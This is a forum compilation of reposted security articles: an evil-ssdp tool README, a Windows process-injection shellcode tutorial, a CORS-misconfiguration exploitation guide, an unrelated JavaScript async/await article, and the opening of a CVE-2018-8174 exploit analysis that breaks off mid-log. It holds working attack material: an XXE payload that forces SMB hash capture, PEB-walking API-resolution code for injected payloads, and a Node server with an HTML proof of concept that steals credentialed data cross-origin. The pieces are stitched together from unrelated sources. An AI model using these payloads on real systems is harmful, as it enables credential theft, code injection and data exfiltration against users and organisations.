Will trigger an "XXE - VULN" alert in the UI for hits and will attempt to force clients to authenticate with the SMB server, with 0 interaction. xxe-exfil: Another example of searching for XXE vulnerabilities, but this time attempting to exfiltrate a test file from a Windows host. Of course you can customize this to look for whatever specific file you are after, Windows or Linux. In the vulnerable applications I've discovered, exfiltration works only on a file with no whitepace or linebreaks. This is due to how it is injected into the URL of a GET request. If you get this working on multi-line files, PLEASE let me know how you did it. Technical Details Simple Service Discovery Protocol (SSDP) is used by Operating Systems (Windows, MacOS, Linux, IOS, Android, etc) and applications (Spotify, Youtube, etc) to discover shared devices on a local network. It is the foundation for discovering and advertising Universal Plug & Play (UPNP) devices. Devices attempting to discover shared network resources will send a UDP multicast out to 239.255.255.250 on port 1900. The source port is randomized. An example request looks like this: M-SEARCH * HTTP/1.1 Host: 239.255.255.250:1900 ST: upnp:rootdevice Man: "ssdp:discover" MX: 3 To interact with this host, we need to capture both the source port and the 'ST' (Service Type) header. The response MUST be sent to the correct source port and SHOULD include the correct ST header. Note that it is not just the Windows OS looking for devices - scanning a typical network will show a large amount of requests from applications inside the OS (like Spotify), mobile phones, and other media devices. Windows will only play ball if you reply with the correct ST, other sources are more lenient. evilSSDP will extract the requested ST and send a reponse like the following: HTTP/1.1 200 OK CACHE-CONTROL: max-age=1800 DATE: Tue, 26 Jun 2018 01:06:26 GMT EXT: LOCATION: http://192.168.1.131:8888/ssdp/device-desc.xml SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1 ST: upnp:rootdevice USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice BOOTID.UPNP.ORG: 0 CONFIGID.UPNP.ORG: 1 The location IP, ST, and date are constructed dynamically. This tells the requestor where to find more information about our device. Here, we are forcing Windows (and other requestors) to access our 'Device Descriptor' xml file and parse it. The USN is just a random string and needs only to be unique and formatted properly. evilSSDP will pull the 'device.xml' file from the chosen templates folder and dynamically plug in some variables such as your IP address. This 'Device Descriptor' file is where you can customize some juicy-sounding friendly names and descriptions. It looks like this: <root> <specVersion> <major>1</major> <minor>0</minor> </specVersion> <device> <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType> <friendlyName>IT Password Vault</friendlyName> <manufacturer>PasSecure</manufacturer> <manufacturerURL>http://passecure.com</manufacturerURL> <modelDescription>Corporate Password Repository</modelDescription> <modelName>Core</modelName> <modelNumber>1337</modelNumber> <modelURL>http://passsecure.com/1337</modelURL> <serialNumber>1337</serialNumber> <UDN>uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563</UDN> <serviceList> <service> <URLBase>http://$localIp:$localPort</URLBase> <serviceType>urn:ecorp.co:service:ePNP:1</serviceType> <serviceId>urn:epnp.ecorp.co:serviceId:ePNP</serviceId> <controlURL>/epnp</controlURL> <eventSubURL/> <SCPDURL>/service-desc.xml</SCPDURL> </service> </serviceList> <presentationURL>http://$localIp:$localPort/present.html</presentationURL> </device> </root> A key line in this file contains the 'Presentation URL'. This is what will load in a user's browser if they decide to manually double-click on the UPNP device. evilSSDP will host this file automatically (present.html from the chosen template folder), plugging in your source IP address into an IMG tag to access an SMB share that you can host with tools like Impacket, Responder, or Metasploit. The IMG tage looks like this: <img src="file://///$localIp/smb/hash.jpg" style="display: none;" /><br> Zero-Day Hunting By default, this tool essentially forces devices on the network to parse an XML file. A well-known attack against applications that parse XML exists - XML External Entity Processing (XXE). This type of attack against UPNP devices in likely overlooked - simply because the attack method is complex and not readily apparent. However, evilSSDP makes it very easy to test for vulnerable devices on your network. Simply run the tool and look for a big [XXE VULN!!!] in the output. NOTE: using the xxe template will likely not spawn visibile evil devices across the LAN, it is meant only for zero-interaction scenarios. This is accomplished by providing a Device Descriptor XML file with the following content: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" > <!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" > ]> <hello>&xxe;&xxe-url;</hello> When a vulnerable XML parser reads this file, it will automatically mount the SMB share (allowing you to crack the hash or relay) as well as access an HTTP URL to notify you it was discovered. The notification will contain the HTTP headers and an IP address, which should give you some info on the vulnerable application. If you see this, please do contact the vendor to fix the issue. Also, I would love to hear about any zero days you find using the tool. Customization This is an early beta, but constructed in such a way to allow easy template creation in the future. I've included two very basic templates - simply duplicate a template folder and customize for your own use. Then use the '-t' parameter to choose your new template. The tool currently only correctly creates devices for the UPNP 'rootdevice' device type, although it is responding to the SSDP queries for all devices types. If you know UPNP well, you can create a new template with the correct parameters to fufill requests for other device types as well. Thanks Thanks to ZeWarren and his project here. I used this extensively to understand how to get the basics for SSDP working. Also thanks to Microsoft for developing lots of fun insecure things to play with. Sursa: https://gitlab.com/initstring/evil-ssdp
-
Process Injection: Writing the payload Posted on July 12, 2018 by odzhan Introduction The purpose of this post is to discuss a Position Independent Code (PIC) written in C that will be used for demonstrating process injection on the Windows operating system. The payload will simply execute an instance of the calculator, and is not intended to be malicious in any way. In follow up posts, I’ll discuss a number of injection methods to help the reader understand how they work. Below is a screenshot of the PROPagate method in action, that I’ll hopefully discuss in a follow up post. Function prototypes Most of the injection methods require a PIC to run successfully in a remote process space, unless of course one wants to load a Dynamic-link Library. (DLL) In the case of loading a DLL, one only needs to execute the LoadLibrary API providing the path of a DLL as parameter. Traditionally, PICs have been written in C or assembly, but there are problems when using pure assembly code. Consider that Windows can run on multiple architectures (e.g x86,amd64,arm), with multiple calling conventions (e.g stdcall,fastcall). What if corrections or changes to the code are required? For those reasons, it makes more sense to use a High-level Language (HLL) like C. Some of the methods that will be discussed have individual requirements. Some of the callback functions executed will be passed a number of parameters, and due to calling convention will expect those parameters be removed upon returning to the caller. Thread procedure Creating a new thread in a remote process can be performed using one of the following API. CreateRemoteThread RtlCreateUserThread NtCreateThreadEx ZwCreateThreadEx Each API expects a pointer to a ThreadProc callback function. The following is defined in the Windows SDK. This is also perfect for LoadLibrary that only expects one parameter. DWORD WINAPI ThreadProc( _In_ LPVOID lpParameter); Asynchronous Procedure Call It’s also possible to attach a PIC to an existing thread by using one of the following API. The thread must be alertable for this to work, and there’s no convenient way to determine if a thread is alertable or not. QueueUserAPC NtQueueApcThread NtQueueApcThreadEx ZwQueueApcThread ZwQueueApcThreadEx RtlQueueApcWow64Thread VOID CALLBACK APCProc( _In_ ULONG_PTR dwParam); WindowProc callback function Some of you will know of the Extra Window Memory (EWM) injection method? The well-known method involves replacing the “CTray” object that is used to control the behavior of the “Shell_TrayWnd” class registered by explorer.exe. Some versions of Windows permit updating this object via SetWindowLongPtr, therefore allowing code execution without the creation of a new thread, but more on that later! The following API can be used to update the window’s callback function. SetWindowLong (32-bit) GetWindowLong (32-bit) SetWindowLongPtr (32 and 64-bit) GetWindowLongPtr (32 and 64-bit) LRESULT CALLBACK WindowProc( _In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam); Subclass callback function The PROPagate method, is named after the APIs GetProp and SetProp used to change the address of a callback function for a subclassed window. As of July 2018, this is a relatively new technique that’s similar to the EWM injection or shatter attacks described in 2002. The following API (but not all) may be of interest. GetProp SetProp EnumProps typedef LRESULT ( CALLBACK *SUBCLASSPROC)( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData); Dynamic-link Library (DLL) Although not a PIC, process injection can sometimes involve loading a DLL. Compiling the payload into a DLL is therefore an option. __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved); Compiling To generate the appropriate payload using the correct parameters and return type, we use the define directive. If we need to compile the payload for another function prototype, it would be relatively easy to amend this code. #ifdef XAPC // Asynchronous Procedure Call VOID CALLBACK APCProc(ULONG_PTR dwParam) #endif #ifdef THREAD // Create remote thread DWORD WINAPI ThreadProc(LPVOID lpParameter) #endif #ifdef SUBCLASS // Window subclass callback procedure LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData) #endif #ifdef WINDOW // Window callback procedure LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) #endif #ifdef DLL // compile as Dynamic-link Library #pragma warning( push ) #pragma warning( disable : 4100 ) __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved) #endif What if the payload is called multiple times? For each method discussed, I will address that question. Declaring strings If you declare a string in C, and compile the source into an executable, you might find string literals stored in a read-only section of memory. This is a problem for a PIC because we need all variables, including strings stored on the stack. To illustrate the problem, consider the following simple piece of code. #include <stdio.h> int main(void){ char msg[]="Hello, World!\n"; printf("%s", msg); return 0; } Although this assembly output of the MSVC compiler isn’t very readable, it shows the stack isn’t used for local storage of the string literal. The solution might be declaring the string as a byte array, like the following. #include <stdio.h> int main(void){ char msg[]={'H','e','l','l','o',',',' ','W','o','r','l','d','!','\n',0}; printf("%s", msg); return 0; } The assembly output of this shows MSVC will use the local stack. This works for MSVC, but unfortunately not for GCC that will still store the string in read-only section of the executable. What other options are there? Use inline assembly If I recall correctly, it was Z0MBiE/29a who once suggested in Solving Plain Strings Problem In HLL using macro based assembly with the Borland C compiler to store strings on the stack for the purpose of obfuscation. In Phrack #69, Shellcode the better way, or how to just use your compiler by fishstiqz suggests using an inline macro. #define INLINE_STR(name, str) \ const char * name; \ asm( \ "call 1f\n" \ ".asciz \"" str "\"\n" \ "1:\n" \ "pop %0\n" \ : "=r" (name) \ ); The macro can be used with the following. INLINE_STR(kernel32, "kernel32"); PVOID pKernel32 = scGetModuleBase(kernel32); We’re depending on assembly code here, and that’s precisely what we should avoid. We also can’t inline 64-bit assembly, as fishstiqz points out. What else? Declaration using arrays After examining various options, and having taken the advice of others (@solardiz) declaring strings as 32-bit arrays solves the problem for both GCC and MSVC. #include <stdio.h> typedef unsigned int W; int main(void){ W msg[4]; msg[0]=*(W*)"Hell"; msg[1]=*(W*)"o, W"; msg[2]=*(W*)"orld"; msg[3]=*(W*)"!\n"; printf("%s", (char*)msg); return 0; } As you can see from MSVC and GCC output, both place the string on the stack. MSVC output GCC output Of course, it would make sense to automate this process, rather than try initialize manually 😉 Declaring function pointers You don’t have to declare function pointers in this way, but for a shellcode, it makes the code much easier to read. typedef HANDLE (WINAPI *OpenEvent_t)( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ LPCTSTR lpName); typedef BOOL (WINAPI *SetEvent_t)( _In_ HANDLE hEvent); typedef BOOL (WINAPI *CloseHandle_t)( _In_ HANDLE hOject); typedef UINT (WINAPI *WinExec_t)( _In_ LPCSTR lpCmdLine, _In_ UINT uCmdShow); Once the function is defined, you can declare it inside the main code, like so. SetEvent_t pSetEvent; OpenEvent_t pOpenEvent; CloseHandle_t pCloseHandle; WinExec_t pWinExec; Resolving API addresses Rather than cover the same ground, I recommend reading two posts about this task. Resolving API addresses in memory, and Fido, how it resolves GetProcAddress and LoadLibraryA. These both cover some good ways to resolve API dynamically using the Import Address Table (IAT) and Export Address Tables (EAT) of a Portable Executable (PE) file. Traversing the Process Environment Block (PEB) modules is commonly found in shellcodes, and it’s required for a PIC to resolve address of API functions. // search all modules in the PEB for API LPVOID xGetProcAddress(LPVOID pszAPI) { PPEB peb; PPEB_LDR_DATA ldr; PLDR_DATA_TABLE_ENTRY dte; LPVOID api_adr=NULL; #if defined(_WIN64) peb = (PPEB) __readgsqword(0x60); #else peb = (PPEB) __readfsdword(0x30); #endif ldr = (PPEB_LDR_DATA)peb->Ldr; // for each DLL loaded dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink; for (;dte->DllBase != NULL && api_adr == NULL; dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink) { // search the export table for api api_adr=FindExport(dte->DllBase, (PCHAR)pszAPI); } return api_adr; } Searching the Export Address Table (EAT) One can certainly search the Import Address Table (IAT) for the address of API, but the following uses the Export Addres Table. This function doesn’t handle forward references. Note that we’re also searching by string, instead of hash. // locate address of API in export address table LPVOID FindExport(LPVOID base, PCHAR pszAPI){ PIMAGE_DOS_HEADER dos; PIMAGE_NT_HEADERS nt; DWORD cnt, rva, dll_h; PIMAGE_DATA_DIRECTORY dir; PIMAGE_EXPORT_DIRECTORY exp; PDWORD adr; PDWORD sym; PWORD ord; PCHAR api, dll; LPVOID api_adr=NULL; dos = (PIMAGE_DOS_HEADER)base; nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory; rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; // if no export table, return NULL if (rva==0) return NULL; exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva); cnt = exp->NumberOfNames; // if no api names, return NULL if (cnt==0) return NULL; adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions); sym = RVA2VA(PDWORD,base, exp->AddressOfNames); ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals); dll = RVA2VA(PCHAR, base, exp->Name); do { // calculate hash of api string api = RVA2VA(PCHAR, base, sym[cnt-1]); // add to DLL hash and compare if (!xstrcmp(pszAPI, api)){ // return address of function api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]); return api_adr; } } while (--cnt && api_adr==0); return api_adr; } Summary If we use C instead of assembly, writing a payload isn’t that difficult. The next posts on this subject will cover some injection methods individually. I’ll post source code shortly. Sursa: https://modexp.wordpress.com/2018/07/12/process-injection-writing-payload/
-
Advanced CORS Exploitation Techniques Posted by Corben Leo on June 16, 2018 Preface I’ve seen some fantastic research done by Linus Särud and by Bo0oM on how Safari’s handling of special characters could be abused. https://labs.detectify.com/2018/04/04/host-headers-safari/ https://lab.wallarm.com/the-good-the-bad-and-the-ugly-of-safari-in-client-side-attacks-56d0cb61275a Both articles dive into practical scenarios where Safari’s behavior can lead to XSS or Cookie Injection. The goal of this post is bring even more creativity and options to the table! Introduction: Last November, I wrote about a tricky cross-origin resource sharing bypass in Yahoo View that abused Safari’s handling of special characters. Since then, I’ve found more bugs using clever bypasses and decided to present more advanced techniques to be used. Note: This assumes you have a basic understanding of what CORS is and how to exploit misconfigurations. Here are some awesome posts to get you caught up: Portswigger’s Post Geekboy’s post Background: DNS & Browsers: Quick Summary: The Domain Name System is essentially an address book for servers. It translates/maps hostnames to IP addresses, making the internet easier to use. When you attempt to visit a URL into a browser: A DNS lookup is performed to convert the host to an IP address ⇾ it initiates a TCP connection to the server ⇾ the server responds with SYN+ACK ⇾ the browser sends an HTTP request to the server to retrieve content ⇾ then renders / displays the content accordingly. If you’re a visual thinker, here is an image of the process. DNS servers respond to arbitrary requests – you can send any characters in a subdomain and it’ll respond as long as the domain has a wildcard DNS record. Example: dig A "<@$&(#+_\`^%~>.withgoogle.com" @1.1.1.1 | grep -A 1 "ANSWER SECTION" Browsers? So we know DNS servers respond to these requests, but how do browsers handle them? Answer: Most browsers validate domain names before making any requests. Examples: Chrome: Firefox: Safari: Notice how I said most browsers validate domain names, not all of them do. Safari is the divergent: if we attempt to load the same domain, it will actually send the request and load the page: We can use all sorts of different characters, even unprintable ones: ,&'";!$^*()+=`~-_=|{}% // non printable chars %01-08,%0b,%0c,%0e,%0f,%10-%1f,%7f Jumping into CORS Configurations Most CORS integrations contain a whitelist of origins that are permitted to read information from an endpoint. This is usually done by using regular expressions. Example #1: ^https?:\/\/(.*\.)?xxe\.sh$ Intent: The intent of implementing a configuration with this regex would be to allow cross-domain access from xxe.sh and any subdomain (http:// or https://) The only way an attacker would be able to steal data from this endpoint, is if they had either an XSS or subdomain takeover on http(s)://xxe.sh / http(s)://*.xxe.sh. Example #2: ^https?:\/\/.*\.?xxe\.sh$ Intent: Same as Example #1 – allow cross-domain access from xxe.sh and any subdomain This regular expression is quite similar to the first example, however it contains a problem that would cause the configuration to be vulnerable to data theft. The problem lies in the following regex: .*\.? Breakdown: .* = any characters except for line terminators \. = a period ? = a quantifier, in this case matches "." either zero or one times. Since .*\. is not in a capturing group (like in the first example), the ? quantifier only affects the . character, therefore any characters are allowed before the string “xxe.sh”, regardless of whether there is a period separating them. This means an attacker could send any origin ending in xxe.sh and would have cross-domain access. This is a pretty common bypass technique – here’s a real example of it: https://hackerone.com/reports/168574 by James Kettle Example #3: ^https?:\/\/(.*\.)?xxe\.sh\:?.* Intent: This would be likely be implemented with the intent to allow cross-domain access from xxe.sh, all subdomains, and from any ports on those domains. Can you spot the problem? Breakdown: \: = Matches the literal character ":" ? = a quantifier, in this case matches ":" either zero or one times. .* = any characters except for line terminators Just like in the second example, the ? quantifier only affects the : character. So if we send an origin with other characters after xxe.sh, it will still be accepted. The Million Dollar Question: How does Safari’s handling of special characters come into play when exploiting CORS Misconfigurations? Take the following Apache configuration for example: SetEnvIf Origin "^https?:\/\/(.*\.)?xxe.sh([^\.\-a-zA-Z0-9]+.*)?" AccessControlAllowOrigin=$0 Header set Access-Control-Allow-Origin %{AccessControlAllowOrigin}e env=AccessControlAllowOrigin This would be likely be implemented with the intent of cross-domain access from xxe.sh, all subdomains, and from any ports on those domains. Here’s a breakdown of the regular expression: [^\.\-a-zA-Z0-9] = does not match these characters: "." "-" "a-z" "A-Z" "0-9" + = a quantifier, matches above chars one or unlimited times (greedy) .* = any character(s) except for line terminators This API won’t give access to domains like the ones in the previous examples and other common bypass techniques won’t work. A subdomain takeover or an XSS on *.xxe.sh would allow an attacker to steal data, but let’s get more creative! We know any origin as *.xxe.sh followed by the characters . - a-z A-Z 0-9 won’t be trusted. What about an origin with a space after the string “xxe.sh”? We see that it’s trusted, however, such a domain isn’t supported in any normal browser. Since the regex matches against alphanumeric ASCII characters and . -, special characters after “xxe.sh” would be trusted: Such a domain would be supported in a modern, common browser: Safari. Exploitation: Pre-Requisites: A domain with a wildcard DNS record pointing it to your box. NodeJS Like most browsers, Apache and Nginx (right out of the box) also don’t like these special characters, so it’s much easier to serve HTML and Javascript with NodeJS. [+] serve.js var http = require('http'); var url = require('url'); var fs = require('fs'); var port = 80 http.createServer(function(req, res) { if (req.url == '/cors-poc') { fs.readFile('cors.html', function(err, data) { res.writeHead(200, {'Content-Type':'text/html'}); res.write(data); res.end(); }); } else { res.writeHead(200, {'Content-Type':'text/html'}); res.write('never gonna give you up...'); res.end(); } }).listen(port, '0.0.0.0'); console.log(`Serving on port ${port}`); In the same directory, save the following: [+] cors.html <!DOCTYPE html> <html> <head><title>CORS</title></head> <body onload="cors();"> <center> cors proof-of-concept:<br><br> <textarea rows="10" cols="60" id="pwnz"> </textarea><br> </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("pwnz").innerHTML = this.responseText; } }; xhttp.open("GET", "http://x.xxe.sh/api/secret-data/", true); xhttp.withCredentials = true; xhttp.send(); } </script> Start the NodeJS server by running the following command: node serve.js & Like stated before, since the regular expression matches against alphanumeric ASCII characters and . -, special characters after “xxe.sh” would be trusted: So if we open Safari and visit http://x.xxe.sh{.<your-domain>/cors-poc, we will see that we were able to successfully steal data from the vulnerable endpoint. Edit: It was brought to my attention that the _ character (in subdomains) is not only supported in Safari, but also in Chrome and Firefox! Therefore http://x.xxe.sh_.<your-domain>/cors-poc would send valid origin from the most common browsers! Thanks Prakash, you rock! Practical Testing With these special characters now in mind, figuring out which Origins are reflected in the Access-Control-Allow-Origin header can be a tedious, time-consuming task: Introducing TheftFuzzer: To save time and to become more efficient, I decided to code a tool to fuzz CORS configurations for allowed origins. It’s written in Python and it generates a bunch of different permutations for possible CORS bypasses. It can be found on my Github here. If you have any ideas for improvements to the tool, feel free to ping me or make a pull request! Outro I hope this post has been informative and that you’ve learned from it! Go exploit those CORS configurations and earn some bounties 😝 Happy Hunting! Corben Leo https://twitter.com/hacker_ https://hackerone.com/cdl https://bugcrowd.com/c https://github.com/sxcurity Sursa: https://www.sxcurity.pro/advanced-cors-techniques/
-
- 2
-
-
JavaScript async/await: The Good Part, Pitfalls and How to Use The async/await introduced by ES7 is a fantastic improvement in asynchronous programming with JavaScript. It provided an option of using synchronous style code to access resoruces asynchronously, without blocking the main thread. However it is a bit tricky to use it well. In this article we will explore async/await from different perspectives, and will show how to use them correctly and effectively. The good part in async/await The most important benefit async/await brought to us is the synchronous programming style. Let’s see an example. // async/await async getBooksByAuthorWithAwait(authorId) { const books = await bookModel.fetchAll(); return books.filter(b => b.authorId === authorId); } // promise getBooksByAuthorWithPromise(authorId) { return bookModel.fetchAll() .then(books => books.filter(b => b.authorId === authorId)); } It is obvious that the async/awaitversion is way easier understanding than the promise version. If you ignore the await keyword, the code just looks like any other synchronous languages such as Python. And the sweet spot is not only readability. async/await has native browser support. As of today, all the mainstream browsers have full support to async functions. All mainstream browsers support Async functions. (Source: https://caniuse.com/) Native support means you don’t have to transpile the code. More importantly, it facilitates debugging. When you set a breakpoint at the function entry point and step over the await line, you will see the debugger halt for a short while while bookModel.fetchAll() doing its job, then it moves to the next .filter line! This is much easier than the promise case, in which you have to setup another breakpoint on the .filter line. Debugging async function. Debugger will wait at the await line and move to the next on resolved. Another less obvious benefit is the async keyword. It declares that the getBooksByAuthorWithAwait() function return value is guaranteed to be a promise, so that callers can call getBooksByAuthorWithAwait().then(...) or await getBooksByAuthorWithAwait() safely. Think about this case (bad practice!): getBooksByAuthorWithPromise(authorId) { if (!authorId) { return null; } return bookModel.fetchAll() .then(books => books.filter(b => b.authorId === authorId)); } In above code, getBooksByAuthorWithPromise may return a promise (normal case) or a null value (exceptional case), in which case caller cannot call .then() safely. With async declaration, it becomes impossible for this kind of code. Async/await Could Be Misleading Some articles compare async/await with Promise and claim it is the next generation in the evolution of JavaScript asynchronous programming, which I respectfully disagree. Async/await IS an improvement, but it is no more than a syntactic sugar, which will not change our programming style completely. Essentially, async functions are still promises. You have to understand promises before you can use async functions correctly, and even worse, most of the time you need to use promises along with async functions. Consider the getBooksByAuthorWithAwait() and getBooksByAuthorWithPromises() functions in above example. Note that they are not only identical functionally, they also have exactly the same interface! This means getBooksByAuthorWithAwait() will return a promise if you call it directly. Well, this is not necessarily a bad thing. Only the name await gives people a feeling that “Oh great this can convert asynchronous functions to synchronous functions” which is actually wrong. Async/await Pitfalls So what mistakes may be made when using async/await? Here are some common ones. Too Sequential Although await can make your code look like synchronous, keep in mind that they are still asynchronous and care must be taken to avoid being too sequential. async getBooksAndAuthor(authorId) { const books = await bookModel.fetchAll(); const author = await authorModel.fetch(authorId); return { author, books: books.filter(book => book.authorId === authorId), }; } This code looks logically correct. However this is wrong. await bookModel.fetchAll() will wait until fetchAll() returns. Then await authorModel.fetch(authorId) will be called. Notice that authorModel.fetch(authorId) does not depend on the result of bookModel.fetchAll() and in fact they can be called in parallel! However by using await here these two calls become sequential and the total execution time will be much longer than the parallel version. Here is the correct way: async getBooksAndAuthor(authorId) { const bookPromise = bookModel.fetchAll(); const authorPromise = authorModel.fetch(authorId); const book = await bookPromise; const author = await authorPromise; return { author, books: books.filter(book => book.authorId === authorId), }; } Or even worse, if you want to fetch a list of items one by one, you have to rely on promises: async getAuthors(authorIds) { // WRONG, this will cause sequential calls // const authors = _.map( // authorIds, // id => await authorModel.fetch(id)); // CORRECT const promises = _.map(authorIds, id => authorModel.fetch(id)); const authors = await Promise.all(promises); } In short, you still need to think about the workflows asynchronously, then try to write code synchronously with await. In complicated workflow it might be easier to use promises directly. Error Handling With promises, an async function have two possible return values: resolved value, and rejected value. And we can use .then() for normal case and .catch() for exceptional case. However with async/await error handling could be tricky. try…catch The most standard (and my recommended) way is to use try...catch statement. When await a call, any rejected value will be thrown as an exception. Here is an example: class BookModel { fetchAll() { return new Promise((resolve, reject) => { window.setTimeout(() => { reject({'error': 400}) }, 1000); }); } } // async/await async getBooksByAuthorWithAwait(authorId) { try { const books = await bookModel.fetchAll(); } catch (error) { console.log(error); // { "error": 400 } } The catched error is exactly the rejected value. After we caught the exception, we have several ways to deal with it: Handle the exception, and return a normal value. (Not using any return statement in the catch block is equivalent to using return undefined; and is a normal value as well.) Throw it, if you want the caller to handle it. You can either throw the plain error object directly like throw error;, which allows you to use this async getBooksByAuthorWithAwait() function in a promise chain (i.e. you can still call it like getBooksByAuthorWithAwait().then(...).catch(error => ...)); Or you can wrap the error with Error object, like throw new Error(error) , which will give the full stack trace when this error is displayed in the console. Reject it, like return Promise.reject(error) . This is equivalent to throw error so it is not recommended. The benefits of using try...catch are: Simple, traditional. As long as you have experience of other languages such as Java or C++, you won’t have any difficulty understanding this. You can still wrap multiple await calls in a single try...catch block to handle errors in one place, if per-step error handling is not necessary. There is also one flaw in this approach. Since try...catch will catch every exception in the block, some other exceptions which not usually caught by promises will be caught. Think about this example: class BookModel { fetchAll() { cb(); // note `cb` is undefined and will result an exception return fetch('/books'); } } try { bookModel.fetchAll(); } catch(error) { console.log(error); // This will print "cb is not defined" } Run this code an you will get an error ReferenceError: cb is not defined in the console, in black color. The error was output by console.log() but not the JavaScript itself. Sometimes this could be fatal: If BookModel is enclosed deeply in a series of function calls and one of the call swallows the error, then it will be extremely hard to find an undefined error like this. Making functions return both value Another way for error handling is inspired by Go language. It allows async function to return both the error and the result. See this blog post for the detail: How to write async await without try-catch blocks in Javascript ES7 Async/await allows us as developers to write asynchronous JS code that look synchronous. In current JS version we…blog.grossman.io In short, you can use async function like this: [err, user] = await to(UserModel.findById(1)); Personally I don’t like this approach since it brings Go style into JavaScript which feels unnatural, but in some cases this might be quite useful. Using .catch The final approach we will introduce here is to continue using .catch(). Recall the functionality of await: It will wait for a promise to complete its job. Also please recall that promise.catch() will return a promise too! So we can write error handling like this: // books === undefined if error happens, // since nothing returned in the catch statement let books = await bookModel.fetchAll() .catch((error) => { console.log(error); }); There are two minor issues in this approach: It is a mixture of promises and async functions. You still need to understand how promises work to read it. Error handling comes before normal path, which is not intuitive. Conclusion The async/await keywords introduced by ES7 is definitely an improvement to JavaScript asynchronous programming. It can make code easier to read and debug. However in order to use them correctly, one must completely understand promises, since they are no more than syntactic sugar, and the underlying technique is still promises. Hope this post can give you some ideas about async/await themselves, and can help you prevent some common mistakes. Thanks for your reading, and please clap for me if you like this post. Charlee Li Full stack engineer & Tech writer @ Toronto. Sursa: https://hackernoon.com/javascript-async-await-the-good-part-pitfalls-and-how-to-use-9b759ca21cda
-
- 2
-
-
Dissecting modern browser exploit: case study of CVE-2018–8174 When this exploit first emerged in the turn of April and May it spiked my interest, since despite heavy obfuscation, the code structure seemed well organized and the vulnerability exploitation code small enough to make analysis simpler. I downloaded POC from github and decided it would be a good candidate for taking a look at under the hood. At that time two analyses were already published, first from 360 and second from Kaspersky. Both of them helped me understand how it worked, but were not enough to deeply understand every aspect of the exploit. That’s why I’ve decided to analyze it on my own and share my findings. Preprocessing First in order to remove integer obfuscation I used regex substitution in python script: As to obfuscated names, I renamed them progressively during analysis. This analysis is best to be read with source code to which link is at the end. Use after free Vulnerability occurs, when object is terminated and custom defined function Class_Terminate() is called. In this function reference to the object being freed is saved in UafArray. From now on UafArray(i) refers to the deleted object. Also notice the last line in Class_Terminate(). When we copy ClassTerminate object to UafArray its reference counter is increased. To balance it out we free it again by assigning other value to FreedObjectArray. Without this, object's memory wouldn't be freed despite calling Class_Terminate on it and next object wouldn't be allocated in its place. Creating and deleting new objects is repeated 7 times in a loop, after that a new object of class ReuseClass is created. It's allocated in the same memory that was previously occupied by the 7 ClassTerminate instances. To better understand that, here is a simple WinDbg script that tracks all those allocations: bp vbscript!VBScriptClass::TerminateClass ".printf \"Class %mu at %x, terminate called\\n\", poi(@ecx + 0x24), @ecx; g"; bp vbscript!VBScriptClass::Release ".printf \"Class %mu at: %x ref counter, release called: %d\\n\", poi(@eax + 0x24), @ecx, poi(@eax + 0x4); g"; bp vbscript!VBScriptClass::Create+0x55 ".printf \"Class %mu created at %x\\n\", poi(@esi + 0x24), @esi; g"; Here is allocation log from UafTrigger function: Class EmptyClass created at 3a7d90 Class EmptyClass created at 3a7dc8 ... Class ReuseClass created at 22601a0 Class ReuseClass created at 22601d8 Class ReuseClass created at 2260210 ... Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 22605c8 ... Class ClassTerminateB created at 2260600 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 1 Class ClassTerminateB at 2260600, terminate called Class ClassTerminateB at: 70541748 ref counter, release called: 5 Class ClassTerminateB at: 70541748 